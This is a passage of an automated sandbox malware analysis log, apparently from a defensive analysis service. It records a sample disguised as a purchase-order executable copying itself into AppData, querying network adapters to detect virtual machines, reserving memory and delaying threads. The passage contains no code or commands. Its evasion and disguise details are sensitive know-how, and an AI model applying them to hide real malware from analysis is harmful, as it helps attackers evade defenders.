                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe PID: 6752, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 7060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 6840, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 6130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 7130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 7260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 8260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: 1150000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 4CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 61F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 71F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 5FF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 5DC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 6FF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7FF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3080000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 5220000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2400000Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399868Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399748Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399640Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399531Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399419Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399297Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399181Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399063Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398938Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398813Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398688Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398576Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398396Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398262Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398101Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397735Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397606Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397485Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397360Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397235Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397110Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396735Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396610Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396485Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396360Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396235Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396110Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395699Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395336Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395219Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395109Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394999Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394891Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394781Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394672Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394563Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394453Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394342Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394234Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394121Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394000Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393891Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393766Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393641Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393531Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399546Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399107Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398999Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398766Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398327Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398199Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398078Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397963Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397731Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397469Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396807Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396266Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395938Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395201Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394969Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394840Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394516Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394406Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394297Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394188Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394063Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2393953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399547
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399218
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399108
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398672
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398343
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398124
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397899
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397789
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397649
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397540
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397219
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397109
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396999
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396669
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396344
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396125
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395905
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395797
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395687
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395578
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395468
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395359
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395250
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395140
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395031
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394921
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394812
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394703
